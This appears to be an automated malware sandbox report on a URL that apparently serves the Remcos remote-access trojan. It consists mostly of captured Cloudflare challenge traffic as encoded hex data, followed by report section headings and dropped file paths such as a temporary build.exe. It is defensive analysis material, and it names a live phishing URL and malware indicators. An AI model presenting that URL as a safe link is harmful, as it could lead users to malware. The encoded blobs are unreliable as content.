2024-09-25 16:44:37 UTC	847	IN	Data Raw: 36 73 64 34 32 39 54 55 4e 45 63 6d 55 64 63 2b 50 52 61 4c 48 63 76 6e 38 37 64 58 57 34 75 67 7a 64 73 61 47 78 75 66 4c 39 34 4e 46 76 39 7a 69 31 4a 37 47 56 62 68 6c 76 62 32 64 6e 61 4a 33 53 56 72 78 66 63 2b 6e 32 2b 4e 54 73 5a 37 2f 48 37 2f 4d 72 33 67 35 58 64 53 49 48 79 4a 53 48 31 50 5a 2b 37 66 54 6f 79 6c 32 2b 45 72 71 69 6c 67 5a 34 4e 61 4c 59 42 39 67 6f 56 47 61 48 6a 52 39 33 48 76 31 5a 72 55 34 58 44 73 46 54 32 30 6b 48 33 50 4f 62 7a 62 57 6b 30 43 67 47 31 6a 61 63 56 49 55 6e 41 51 62 39 46 2b 56 65 78 79 4c 4d 7a 6b 70 63 4c 76 30 49 4a 56 37 41 48 51 49 4f 43 41 55 59 48 78 37 76 35 71 67 53 63 6d 59 48 74 54 71 53 41 79 5a 4c 45 4a 54 4b 32 32 42 69 65 34 69 71 33 78 73 71 70 6d 34 53 41 66 39 48 71 39 61 32 44 6e 4a 34 75 Data Ascii: 6sd429TUNEcmUdc+PRaLHcvn87dXW4ugzdsaGxufL94NFv9zi1J7GVbhlvb2dnaJ3SVrxfc+n2+NTsZ7/H7/Mr3g5XdSIHyJSH1PZ+7fToyl2+ErqilgZ4NaLYB9goVGaHjR93Hv1ZrU4XDsFT20kH3PObzbWk0CgG1jacVIUnAQb9F+VexyLMzkpcLv0IJV7AHQIOCAUYHx7v5qgScmYHtTqSAyZLEJTK22Bie4iq3xsqpm4SAf9Hq9a2DnJ4u

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:38 UTC	438	OUT	GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:38 UTC	210	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:38 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8c8c7ae2cc2442d1-EWR
2024-09-25 16:44:38 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:38 UTC	925	OUT	POST /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 2740 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: 596e5d08887dcbd sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:38 UTC	2740	OUT	Data Raw: 76 5f 38 63 38 63 37 61 64 38 63 39 36 39 34 31 61 36 3d 70 5a 6e 45 31 45 6d 45 5a 45 6a 45 43 30 47 4f 30 47 62 45 30 38 74 69 66 42 30 4e 47 66 47 77 63 38 35 58 49 47 67 41 50 47 49 49 30 6c 47 44 47 24 38 4e 69 56 49 47 71 65 45 35 45 35 69 37 53 6f 56 66 49 47 78 47 6c 49 74 63 47 70 55 69 58 4a 47 74 49 47 4a 53 47 41 69 47 53 65 47 47 69 4a 73 45 66 69 37 76 35 50 25 32 62 46 65 70 6e 4a 45 74 6c 47 63 4c 67 71 6e 47 57 41 38 37 42 6f 4b 77 64 61 36 75 68 6a 24 52 69 6c 47 42 45 49 45 47 6b 49 37 24 35 56 49 65 65 7a 5a 51 79 53 6a 54 35 77 24 78 35 46 5a 4a 47 41 7a 48 47 4e 41 4e 37 74 58 4a 47 47 56 42 47 66 70 42 45 37 70 78 65 35 47 47 65 38 37 4f 54 4c 62 6f 71 31 6c 6c 53 45 37 43 47 74 6f 47 4e 59 69 47 53 46 67 6c 45 66 6c 47 74 38 69 47 Data Ascii: v_8c8c7ad8c96941a6=pZnE1EmEZEjEC0GO0GbE08tifB0NGfGwc85XIGgAPGII0lGDG$8NiVIGqeE5E5i7SoVfIGxGlItcGpUiXJGtIGJSGAiGSeGGiJsEfi7v5P%2bFepnJEtlGcLgqnGWA87BoKwda6uhj$RilGBEIEGkI7$5VIeezZQySjT5w$x5FZJGAzHGNAN7tXJGGVBGfpBE7pxe5GGe87OTLboq1llSE7CGtoGNYiGSFglEflGt8iG
2024-09-25 16:44:38 UTC	737	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:38 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 162800 Connection: close cf-chl-gen: SO/EgbQ5oYOGKD81p8JPM4OPHa67XtaLy4/p0SmN/27Dm8bYOPPW/HinChtOajxtFMAJlwpxs/NcaKXsRKIBwFLJ1Sf161NjlZ33See8clzv0bj7LhmpP6YAW1TJssxwzEdD6U1tVVxageLJfuxKk6vCX6Z/NQtlu4VOR+ca6SKc8bnmFifRLoWDgke3OeTM/gYDUw8a52/IQiL7ES5opIqpWwiNYgjL55OK0GrK189Zu3Ci2QflXaszStNFGyLy3X+pheWRAKgRfx0LX0eZm9GEYFcGO9AQ9aXi7owenebhJlcuy9xWMXvZUT/BFfk7coSljdwuk3bMBa2FzURFQzyKlhMlD0lGWgo3b32rmzoeq3zybs3Mx6H7o2pmdx5YWhttATyOP4J2u+zmMLTfJHM5Nd0g8wXsVaNmySYkHtreKjnT8iUi9Bw55lGYO/C75Aoyc006nWcHa4z4EuJnhQUT3B0LH71+NqmQzBQ8jSRg1HSiPpW3aJUCnCXlfRiwqA==$xHm1j7/m6RAknd/Y Server: cloudflare CF-RAY: 8c8c7ae39f9d42e3-EWR
2024-09-25 16:44:38 UTC	632	IN	Data Raw: 6c 49 65 33 74 61 2b 64 66 62 4f 6a 6f 61 32 58 70 62 36 7a 76 70 6a 4c 74 36 69 6f 6d 4b 6e 48 6a 61 7a 4a 79 39 62 42 78 5a 6e 56 31 5a 65 72 31 38 33 57 31 2b 4c 62 6e 75 4c 6b 75 36 6e 57 36 71 62 63 35 63 6e 4c 36 38 6e 44 34 39 62 48 36 72 66 6d 37 72 6a 53 79 50 32 39 38 76 4c 33 7a 37 76 34 2b 50 54 2b 30 73 72 35 41 73 62 59 2f 73 72 4e 46 50 76 76 35 51 77 48 36 42 58 78 39 78 4d 5a 39 66 33 74 49 76 55 43 33 65 34 5a 46 2b 59 49 49 76 55 44 41 53 2f 70 4c 69 77 69 2f 53 41 43 42 6a 41 4c 36 2f 67 34 4e 75 2f 38 50 52 51 65 41 68 59 68 41 68 34 68 45 52 30 65 4c 52 39 50 53 67 34 39 45 6b 51 64 50 56 49 51 54 55 55 51 53 68 68 5a 55 31 45 62 45 30 74 66 49 57 46 6a 52 42 35 54 50 44 31 47 58 32 67 34 54 55 6c 4c 61 6c 31 46 55 69 34 76 55 47 5a Data Ascii: lIe3ta+dfbOjoa2Xpb6zvpjLt6iomKnHjazJy9bBxZnV1Zer183W1+LbnuLku6nW6qbc5cnL68nD49bH6rfm7rjSyP298vL3z7v4+PT+0sr5AsbY/srNFPvv5QwH6BXx9xMZ9f3tIvUC3e4ZF+YIIvUDAS/pLiwi/SACBjAL6/g4Nu/8PRQeAhYhAh4hER0eLR9PSg49EkQdPVIQTUUQShhZU1EbE0tfIWFjRB5TPD1GX2g4TUlLal1FUi4vUGZ
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 65 48 64 75 63 31 71 53 62 58 5a 61 56 6e 4f 69 65 35 64 39 66 33 39 69 6c 6e 4f 66 62 49 4f 75 6a 6f 65 79 70 47 2b 30 68 48 61 48 67 33 47 70 69 58 57 50 63 48 32 76 65 61 75 5a 6b 72 58 48 67 5a 36 78 70 4b 65 5a 69 6f 71 42 76 4b 61 49 77 64 4c 43 6a 74 57 57 30 37 4c 4b 75 74 50 4d 32 39 61 34 6d 61 4b 76 6e 4c 50 42 70 71 66 59 34 75 50 61 31 39 66 6b 75 62 4c 41 73 38 58 4f 39 4b 37 5a 74 39 7a 4b 2b 64 61 38 2f 4c 33 69 74 64 72 31 38 50 66 6a 77 2f 6a 70 41 41 76 69 39 78 41 4f 46 42 41 49 35 77 54 6c 30 52 59 47 32 76 6f 5a 33 50 51 68 32 41 34 4f 31 68 7a 6a 49 75 55 64 49 65 76 36 4a 42 63 47 49 51 33 2b 48 7a 48 74 39 6a 55 78 4b 42 72 78 39 52 73 4d 46 78 73 74 2f 44 41 78 49 44 6c 45 4d 53 55 71 42 41 6f 36 47 53 38 5a 48 55 6c 45 49 77 68 Data Ascii: eHduc1qSbXZaVnOie5d9f39ilnOfbIOujoeypG+0hHaHg3GpiXWPcH2veauZkrXHgZ6xpKeZioqBvKaIwdLCjtWW07LKutPM29a4maKvnLPBpqfY4uPa19fkubLAs8XO9K7Zt9zK+da8/L3itdr18Pfjw/jpAAvi9xAOFBAI5wTl0RYG2voZ3PQh2A4O1hzjIuUdIev6JBcGIQ3+HzHt9jUxKBrx9RsMFxst/DAxIDlEMSUqBAo6GS8ZHUlEIwh
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 46 5a 7a 69 33 71 41 6e 33 61 57 64 5a 4e 34 6c 47 52 31 65 6f 71 6a 6d 6d 75 64 62 5a 36 77 70 4c 4f 30 6c 35 6c 35 74 48 61 4c 70 33 32 73 72 35 36 64 75 4c 32 6e 78 63 65 64 70 61 57 73 77 61 72 50 75 59 36 4b 30 72 4b 74 6b 61 71 30 32 64 48 5a 31 64 6e 59 72 72 58 4b 34 39 53 62 77 4f 58 63 78 4b 65 70 76 4b 50 75 71 38 54 4d 32 71 6e 4f 71 39 44 32 31 73 58 32 77 39 4c 73 39 2f 7a 4b 38 77 44 41 38 2f 51 41 35 39 45 44 38 75 4c 47 31 51 38 49 77 65 4c 63 2f 52 41 54 7a 65 34 52 38 78 59 44 42 41 73 54 32 67 73 51 46 39 37 67 48 42 6f 65 48 69 51 53 4a 79 50 35 48 69 54 35 42 43 49 72 4d 51 48 78 42 77 38 44 44 42 55 6d 45 7a 73 53 4f 68 4d 68 2b 76 55 6a 47 6a 67 66 53 53 73 6b 4b 55 30 34 47 51 67 4d 44 6b 77 64 42 78 56 45 4d 43 68 4c 4d 45 67 31 Data Ascii: FZzi3qAn3aWdZN4lGR1eoqjmmudbZ6wpLO0l5l5tHaLp32sr56duL2nxcedpaWswarPuY6K0rKtkaq02dHZ1dnYrrXK49SbwOXcxKepvKPuq8TM2qnOq9D21sX2w9Ls9/zK8wDA8/QA59ED8uLG1Q8IweLc/RATze4R8xYDBAsT2gsQF97gHBoeHiQSJyP5HiT5BCIrMQHxBw8DDBUmEzsSOhMh+vUjGjgfSSskKU04GQgMDkwdBxVEMChLMEg1
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 42 30 70 70 70 6d 5a 61 6d 54 65 36 65 57 6f 59 42 36 5a 49 35 6d 62 4b 61 50 70 62 65 35 63 5a 53 2b 6d 72 47 35 73 71 4c 43 73 36 2b 42 6f 5a 7a 41 6d 73 65 2f 79 72 6d 4f 6f 5a 44 50 6f 36 57 56 72 4a 58 56 6f 36 4c 59 6c 4a 76 4d 32 61 32 36 34 4c 2b 31 72 37 79 69 75 37 50 41 71 72 65 72 33 4f 6e 42 75 38 4c 49 37 36 7a 52 35 76 54 6a 32 64 66 6c 32 4c 62 58 36 2f 6a 4b 7a 67 4c 41 38 41 48 39 31 64 2f 37 39 77 4c 75 35 76 44 2b 32 2f 34 44 41 75 38 43 2b 4f 6f 4e 34 77 7a 76 48 4f 33 57 33 74 6e 67 33 75 38 6f 38 2b 59 41 2b 41 77 46 35 41 30 6c 35 67 55 6d 35 53 59 30 49 7a 49 4b 36 7a 6b 31 4e 66 76 30 46 2f 34 43 47 7a 34 58 4a 79 38 6a 2f 68 49 48 47 77 67 68 43 69 46 4b 55 69 73 47 4a 43 34 51 53 56 67 70 46 77 34 72 4e 57 41 62 46 78 78 69 56 Data Ascii: B0pppmZamTe6eWoYB6ZI5mbKaPpbe5cZS+mrG5sqLCs6+BoZzAmse/yrmOoZDPo6WVrJXVo6LYlJvM2a264L+1r7yiu7PAqrer3OnBu8LI76zR5vTj2dfl2LbX6/jKzgLA8AH91d/79wLu5vD+2/4DAu8C+OoN4wzvHO3W3tng3u8o8+YA+AwF5A0l5gUm5SY0IzIK6zk1Nfv0F/4CGz4XJy8j/hIHGwghCiFKUisGJC4QSVgpFw4rNWAbFxxiV
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 71 66 35 6c 74 73 48 35 6f 61 6f 4f 41 71 61 71 34 6f 58 61 31 69 6e 69 4d 72 36 71 68 6f 4c 65 44 74 72 43 54 6d 59 43 6d 79 63 6d 49 71 34 69 77 7a 4d 72 52 71 71 6a 43 77 70 48 56 75 5a 43 74 31 64 79 76 6d 5a 2b 72 75 62 2b 32 72 36 36 64 71 4f 54 68 36 4b 65 6c 77 36 33 4d 76 73 71 72 7a 75 76 33 79 37 54 79 31 66 72 76 2b 66 62 54 7a 62 72 61 39 4d 4b 38 33 64 2f 39 30 63 4c 55 78 4e 67 51 78 76 7a 44 79 38 6b 4c 34 77 45 4b 47 67 38 62 31 78 49 51 38 68 55 57 34 52 41 6c 31 75 44 2b 43 66 48 6d 46 53 51 69 2b 41 54 6c 48 75 66 38 41 66 44 76 4a 65 6e 75 47 52 4d 76 48 52 59 61 49 43 34 77 49 79 38 75 4d 79 55 7a 51 55 49 61 41 68 6c 45 4a 79 63 73 45 55 4e 41 4b 41 34 68 4e 68 45 57 46 56 6c 56 57 42 56 68 56 47 41 69 4f 7a 56 64 49 7a 49 6e 53 32 Data Ascii: qf5ltsH5oaoOAqaq4oXa1iniMr6qhoLeDtrCTmYCmycmIq4iwzMrRqqjCwpHVuZCt1dyvmZ+rub+2r66dqOTh6Kelw63Mvsqrzuv3y7Ty1frv+fbTzbra9MK83d/90cLUxNgQxvzDy8kL4wEKGg8b1xIQ8hUW4RAl1uD+CfHmFSQi+ATlHuf8AfDvJenuGRMvHRYaIC4wIy8uMyUzQUIaAhlEJycsEUNAKA4hNhEWFVlVWBVhVGAiOzVdIzInS2
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 73 34 79 72 6a 36 61 6a 68 70 52 30 70 72 75 64 6b 4a 56 32 75 34 32 39 6f 70 71 34 6b 4d 54 47 73 73 4f 49 79 4a 36 67 6e 34 32 4c 77 63 65 6e 71 5a 61 50 71 62 76 49 6c 62 75 32 33 73 33 42 77 4c 75 79 72 38 2f 6c 77 62 58 48 78 71 66 6e 70 63 65 6d 7a 36 76 73 74 4b 75 77 34 4f 37 79 39 73 54 54 78 76 76 64 7a 73 2f 65 41 2b 50 64 34 75 50 31 39 2b 6e 48 43 2b 6f 45 2b 73 63 4a 7a 4d 6e 67 7a 75 48 6c 46 2b 72 75 43 74 67 51 36 67 72 30 46 65 49 69 47 77 37 7a 39 74 6f 62 43 52 7a 38 4c 79 66 34 37 69 48 2b 4a 77 45 67 46 43 6e 30 38 2f 41 5a 45 44 49 67 47 7a 34 64 4f 42 6f 57 2f 43 41 61 45 68 4a 4c 43 45 34 39 54 30 42 44 54 77 38 50 4e 54 64 50 4e 31 6f 56 52 31 77 76 4e 56 6f 57 4f 56 64 45 4c 43 39 45 4f 46 6f 66 4d 32 56 64 50 45 39 64 55 57 70 Data Ascii: s4yrj6ajhpR0prudkJV2u429opq4kMTGssOIyJ6gn42LwcenqZaPqbvIlbu23s3BwLuyr8/lwbXHxqfnpcemz6vstKuw4O7y9sTTxvvdzs/eA+Pd4uP19+nHC+oE+scJzMngzuHlF+ruCtgQ6gr0FeIiGw7z9tobCRz8Lyf47iH+JwEgFCn08/AZEDIgGz4dOBoW/CAaEhJLCE49T0BDTw8PNTdPN1oVR1wvNVoWOVdELC9EOFofM2VdPE9dUWp
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 61 57 70 6a 70 4f 63 71 62 36 50 72 62 69 59 6b 71 4f 6d 74 62 71 41 76 36 69 6e 70 36 79 4a 78 4a 75 50 7a 39 4c 51 77 4b 47 51 79 4d 66 61 76 63 2b 55 74 71 6a 59 75 72 71 39 6e 70 6a 56 74 71 62 71 6f 75 57 6e 7a 65 44 42 72 74 79 73 36 62 37 78 35 4e 50 42 30 63 66 75 7a 64 33 30 36 38 33 54 32 64 76 41 38 64 51 4a 43 51 66 6f 31 4d 77 49 35 51 37 5a 44 74 76 78 43 39 48 57 31 50 45 4e 7a 51 30 59 38 41 6b 43 43 78 38 6a 39 76 6f 57 4a 79 66 62 35 65 55 4f 41 50 30 6b 47 79 33 79 4a 67 4c 75 44 52 41 4e 39 77 59 55 50 43 67 37 39 6a 41 76 41 68 59 30 44 68 34 39 52 42 55 67 53 6b 67 39 50 44 67 2b 53 79 63 63 4d 54 45 55 4b 6c 67 59 47 56 49 50 46 6b 42 59 53 30 38 2f 4e 56 55 76 55 7a 49 36 57 30 52 63 62 57 6c 4d 4f 7a 45 6f 58 57 4a 6e 52 32 46 41 Data Ascii: aWpjpOcqb6PrbiYkqOmtbqAv6inp6yJxJuPz9LQwKGQyMfavc+UtqjYurq9npjVtqbqouWnzeDBrtys6b7x5NPB0cfuzd30683T2dvA8dQJCQfo1MwI5Q7ZDtvxC9HW1PENzQ0Y8AkCCx8j9voWJyfb5eUOAP0kGy3yJgLuDRAN9wYUPCg79jAvAhY0Dh49RBUgSkg9PDg+SyccMTEUKlgYGVIPFkBYS08/NVUvUzI6W0RcbWlMOzEoXWJnR2FA
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 36 73 66 34 79 34 74 70 53 79 6f 36 4f 61 75 62 32 34 6e 38 32 39 77 36 44 52 6b 63 36 6a 30 71 2b 34 6c 4b 50 45 7a 36 6e 64 76 39 75 76 33 75 48 44 6e 4e 4b 2f 79 4b 58 6c 31 4d 32 6d 32 65 7a 52 71 2b 33 73 30 72 48 69 7a 75 72 47 39 75 54 61 74 75 6e 30 36 62 72 74 77 65 33 42 38 64 76 77 32 2b 50 35 37 64 76 39 7a 51 76 65 78 50 7a 79 7a 67 49 4e 41 74 4c 7a 35 67 2f 72 38 74 33 32 32 77 34 4e 47 4f 44 59 41 41 63 72 4a 65 6b 59 35 53 72 74 45 75 73 66 45 79 62 78 41 43 55 50 4f 7a 62 31 47 2f 6b 71 43 78 6e 37 4c 69 30 78 2f 68 77 79 49 68 73 36 50 6a 6b 67 54 6a 35 45 49 56 49 53 54 79 51 4a 4d 44 6b 56 4a 45 56 51 4b 6c 35 57 57 44 41 73 56 6b 30 31 59 32 5a 4a 61 32 55 71 51 7a 74 65 4f 46 45 70 53 44 39 65 4c 33 4e 45 56 30 5a 55 63 6e 52 4d 53 Data Ascii: 6sf4y4tpSyo6Oaub24n829w6DRkc6j0q+4lKPEz6ndv9uv3uHDnNK/yKXl1M2m2ezRq+3s0rHizurG9uTatun06brtwe3B8dvw2+P57dv9zQvexPzyzgINAtLz5g/r8t322w4NGODYAAcrJekY5SrtEusfEybxACUPOzb1G/kqCxn7Li0x/hwyIhs6PjkgTj5EIVISTyQJMDkVJEVQKl5WWDAsVk01Y2ZJa2UqQzteOFEpSD9eL3NEV0ZUcnRMS
2024-09-25 16:44:38 UTC	1369	IN	Data Raw: 62 74 4b 53 43 69 71 61 6f 69 4b 50 49 75 34 6e 4e 7a 4c 36 4e 6c 72 4c 41 6b 36 2f 45 79 70 62 5a 79 4d 75 61 74 37 37 41 6e 62 75 68 30 71 4b 63 74 74 57 6d 36 65 44 4d 71 75 33 73 33 4b 37 68 30 75 4b 30 7a 2f 6a 59 74 72 37 30 36 62 6e 74 42 65 53 2f 32 38 48 32 77 74 38 4e 39 4d 59 4b 43 66 6a 4b 35 77 48 7a 7a 75 7a 69 41 64 45 57 44 51 62 57 38 77 30 4c 32 65 4c 2b 45 39 30 69 4b 51 6e 68 41 43 30 4d 35 53 6f 70 44 65 77 49 49 52 54 76 44 44 45 61 38 69 59 62 47 66 62 77 43 79 7a 36 50 6a 55 69 41 44 49 39 4d 77 51 32 52 54 55 4a 4a 41 6f 79 43 7a 35 4a 50 77 34 73 45 6a 63 53 52 6c 56 4c 47 45 6f 2f 50 68 70 65 5a 55 4d 66 50 45 64 46 49 6d 63 33 56 53 64 61 5a 56 45 72 62 6d 31 66 4c 6b 78 54 59 54 56 51 64 56 6b 33 65 6a 70 64 4f 30 4e 31 62 6a Data Ascii: btKSCiqaoiKPIu4nNzL6NlrLAk6/EypbZyMuat77Anbuh0qKcttWm6eDMqu3s3K7h0uK0z/jYtr706bntBeS/28H2wt8N9MYKCfjK5wHzzuziAdEWDQbW8w0L2eL+E90iKQnhAC0M5SopDewIIRTvDDEa8iYbGfbwCyz6PjUiADI9MwQ2RTUJJAoyCz5JPw4sEjcSRlVLGEo/PhpeZUMfPEdFImc3VSdaZVErbm1fLkxTYTVQdVk3ejpdO0N1bj

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:39 UTC	486	OUT	GET /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:39 UTC	349	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 16:44:39 GMT Content-Type: application/json Content-Length: 7 Connection: close cf-chl-out: 4IA3++4DQo/dQ/6htSqdo4nGtJCiIc21iik=$q2ffHhGJNXwllPmo cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8c8c7ae99f0d183d-EWR
2024-09-25 16:44:39 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:39 UTC	814	OUT	GET /cdn-cgi/challenge-platform/h/g/pat/8c8c7ad8c96941a6/1727282678369/d41a30965b817c48f2b8012ecc5d4118160944ab876415a0adeddf7d6fb64e62/cwl0dNi4gO4wp8F HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:39 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Wed, 25 Sep 2024 16:44:39 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-09-25 16:44:39 UTC	1985	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 31 42 6f 77 6c 6c 75 42 66 45 6a 79 75 41 45 75 7a 46 31 42 47 42 59 4a 52 4b 75 48 5a 42 57 67 72 65 33 66 66 57 2d 32 54 6d 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g1BowlluBfEjyuAEuzF1BGBYJRKuHZBWgre3ffW-2TmIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-09-25 16:44:39 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:40 UTC	785	OUT	GET /cdn-cgi/challenge-platform/h/g/i/8c8c7ad8c96941a6/1727282678373/4K3pZlDmL6zt7ib HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:40 UTC	170	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:40 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8c8c7af1bff1c336-EWR
2024-09-25 16:44:40 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 41 00 00 00 40 08 02 00 00 00 ca c9 8d b7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRA@IDAT$IENDB`

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://maveuve.github.io/frlpodf/marynewreleasefax.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\json[1].json

C:\Users\user\AppData\Local\Temp\build.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

